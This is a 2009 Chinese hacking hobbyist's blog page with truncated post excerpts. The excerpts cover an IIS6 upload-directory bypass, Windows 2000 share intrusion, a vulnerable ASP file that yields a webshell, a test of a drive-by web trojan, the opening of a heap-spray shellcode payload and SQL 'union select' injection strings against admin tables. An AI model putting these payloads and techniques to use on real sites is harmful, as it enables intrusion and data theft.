颓废の傻鱼'S Blog
百度空间 | 百度首页 
               
 
RSS最新信息
 
用户未订阅RSS信息
   
 
[置顶公告]
 
 
 
     
 
文章列表
 
2009/07/12 17:52

发现者:bloodsword、bink,转载请无视
影响版本:<=4.0 sp7,前面的版本没去看,估计也能日。
利用条件,开启了文件上传功能,iis6环境。

漏洞描述:建立目录的地方,名称过滤上有失误,导致可以绕过过滤建立一个.asp目录
首先注册个账号访问http://www.bbb.com/User/CommPages/FolderImageList.asp?

 
2009/07/12 17:50

不知大家是否了解win2000有一个默认共享的功能,据微软自己说那是为了管理的方便。但笔者今天发现这个功能可以轻易的被攻破,从而控制你的计算机和窃取你的商业秘密。这一次,网络上所有的计算机都变的不安全起来了。

  只要用几个小工具,我们就能够轻易的侵入一台计算机,并完全控制它。现在让我们来看一下这个过程吧。首先入侵的计算机也必须是win2000(professional,server,advancedserver)都可以。想入侵一台计算机首先要知道它的IP,而我们这次是为了试验普遍性,就用了一个扫描工具。我们可以从qq那里知道别人

 
2009/07/12 17:49

在默认的情况下,利用该漏洞可得到上线系统所在服务器的webshell

ASP上线系统中保存上线IP信息的数据库的扩展名默认为asp

写入配置时对参数未作检查,setip.asp相关代码

<%
strIP=Trim(Request.QueryString("Ip"))
strPort=Trim(Request.QueryString("Port"))
strType=Trim(Request.QueryString("Type"))

if strType="0" then
strIP=Request.ServerVariables("REMOTE_HOST")
end if

sql="select * from Info

 
2009/07/12 17:44

      怎么说的,我都无语了,为了分析那个MPEG-2的漏洞,特意跑360上面找挂马地址,然后分析了好多

东有用的东西,但是我那该死的系统他妈没有修复这个漏洞,很倒霉,弄的那个挂马地址,很多游戏木马,

虽然我还开着影子系统,可惜那他妈的不管用了,全部被穿透了,最后系统又中毒了。中毒了肯定得恢复

备份的,可惜该死的不知道怎么的,我在启动的时候找不到恢复的镜像了,最后用朋友的光盘里面GHOST

找到恢复镜像,可是噩梦才开始了,恢复后只有一个盘,这时我才知道

 
2009/07/09 01:09

其实write 和 writeln是没啥区别的,只是后者在输出内容后多加换行符而已

在分析一点代码中看到这么一段代码,如下

document.writeln("<script type=\"text\/javascript\" src=\"http:\/\/js.tongji.linezing.com\/1136402\/tongji.js\"><\/script>");

咋一看都看不明白格式,百度了一下也没找到,最后在一CSDM上看到一篇文档,差不多可以理解了

上面的“\”叫做续行符,我自己理解是连接符,相当+号一样,不过还是有点不明白,明天再查资料

 
2009/07/08 22:09

N年没打漏洞 这漏洞还是知道,不过360也没提示修复,我日死了

今天无聊拿暗组那个MPEG-2网马生成器生成一个马,测试了一下。。。

结果,我用计算器测试,IE7卡了一小下,可爱的计算器呈现出来了,操

赶紧补洞,这漏洞还是挺严重的!!

 
2009/07/07 14:34

我靠 也太搞了 呵呵 啥都不说 绿坝这东西还是不得人心

 
2009/07/07 14:00
发布时间:2009-07-06
测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
var appllaa='0';
var nndx='%'+'u9'+'0'+'9'+'0'+'%u'+'9'+'0'+'9'+appllaa;
var dashell=unescape(nndx+"%u03eb%ueb59%ue805%ufff8%uff
 
2009/07/07 13:59

漏洞说明:
引用:
这个MPEG-20Day漏洞要容易利用得多,而且黑客不再需要网民运行

 
2009/07/06 18:50

好久没上来了,今天上来透个气,考试完了也放假了,有时间上来更新东西了

各位兄弟姐妹可好?

 
2009/06/30 11:03

作者:zake

此方法解决%90注入得到表的不到字段的网站,衷心感谢兄弟2月30日讨论!

我举动力文章的例子,他的是28个字段,加入admin表5个字段,那么

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin

* 就是5个字段?这样来爆ad

 
2009/06/27 12:48

BY Flyh4t
http://bbs.wolvez.org

上次硬盘坏了丢了很多数据

今天某兄弟生日

掏空我的记忆回想起来一个很老的漏洞

 
2009/06/27 12:40
文章出处:http://hi.baidu.com/540410588/ &&www.slenk.net
文章作者:孤水绕城
今天分析了下Bo-Blog 2.0.3的代码,事件是由这个版本的Flyh4t大牛发布的一个已知注入漏洞开始的。进后台捣鼓半天,又看了下代码,真让我发现了Bo-Blog 2.0
 
2009/06/22 20:26
里面的所有文件夹都设置了隐藏属性,而且还不可更改,上网搜索后得如下解决方法,亲测可行。

打开CMD(命令行)窗口。
在命令行下输入:
for /f "delims=" %i in ('dir /b /ad H:') do attrib "H:\%i" -r -s -h /s /d

呵呵
 
2009/06/20 10:56

信息来源:
Bugging Security Team漏洞时代安全技术小组 [B.S.T]
官方地址:http://bugging.com.cn
影响版本:
Powered by Discuz!NT 2.6 以下
程序介绍:
Discuz!NT 是康盛创想(北京)科技有限公司旗下的一款功能强大的基于 ASP.net 平台的社区软件。基于先进的 .Net Framework,默认支持 SQLServer数据库,可扩展支持Access、MySQL等多种数据库,支持IIS5、IIS6、IIS7,安全高效、稳定易用,充分发挥 ASP.net 特性,支持自由选择切换皮肤,支持多种其它论坛的数据转换。 ~dLbhjde n

漏洞

 
     
 
留言板
 
389
ASP网站开发 酷学
http://hi.baidu.com/%B2%E8%B2%A9%CA%BF

交换链接,交个朋友
2009/07/11 12:31| 回复
 
388
ASP网站开发 酷学

交换链接,交个朋友
2009/07/11 12:29| 回复
 
387
BHST的全部傻逼你,你们全部都是脑子有问题的,来黑老子吧
you.250.250.250
叫春哥日死你们
2009/07/11 08:04| 回复
 
386
回复大地℡:呵呵 恭喜你回来了
2009/07/08 22:16| 回复
 
385
我回来啦
2009/07/08 14:30| 回复
 
384
回复fengzhilian10:那是你被坑蒙拐骗才不知道我是菜鸟~
2009/07/07 15:15| 回复
 
383
回复fengzhilian10:应该说大牛风少路过~~
2009/07/07 15:15| 回复
 
382
回复颓废傻鱼:我怎么看你都不是菜鸟······
牛淫哪
2009/07/06 20:03| 回复
 
381
枫少小菜菜淫过
2009/07/06 20:00| 回复
 
380
回复Mistakes:呵呵
2009/07/06 19:29| 回复
 
 
姓 名:    注册
网 址: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      
   
 
 
个人档案
 
颓废傻鱼
男, 21岁
广东 ** 
上次登录:
8小时前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
逆向工程
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
入侵渗透
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
网站链接
 
 
 
 
 
 
     
 
最新评论
 
文章评论|照片评论

 
 

可怜
 
 

傻鱼同学 可怜可怜
 
回复魔武千年:呵呵 黑客就是那样牛 我们是平民
 
回复myzbcn:呵呵 那你说呢
有时间在来海南吧 这里确实很OK~
 
回复魔武千年:呵
我最近就看到那些下载小图片 想收藏一点~
 
回复魔武千年:这个是忽悠人来的呵呵
节日我拿去整朋友的
 
     
 
最近访客
 
 

interprince

gujin170

lazivip

来封我ID

hkxiao7

hi_nilin

qq3398816

叶不落VIP
     
 
背景音乐
 
 
其它
 
已有人次访问本空间
 
订阅RSS  什么是RSS?

您也想拥有这样的空间?请点此申请。
     


©2009 Baidu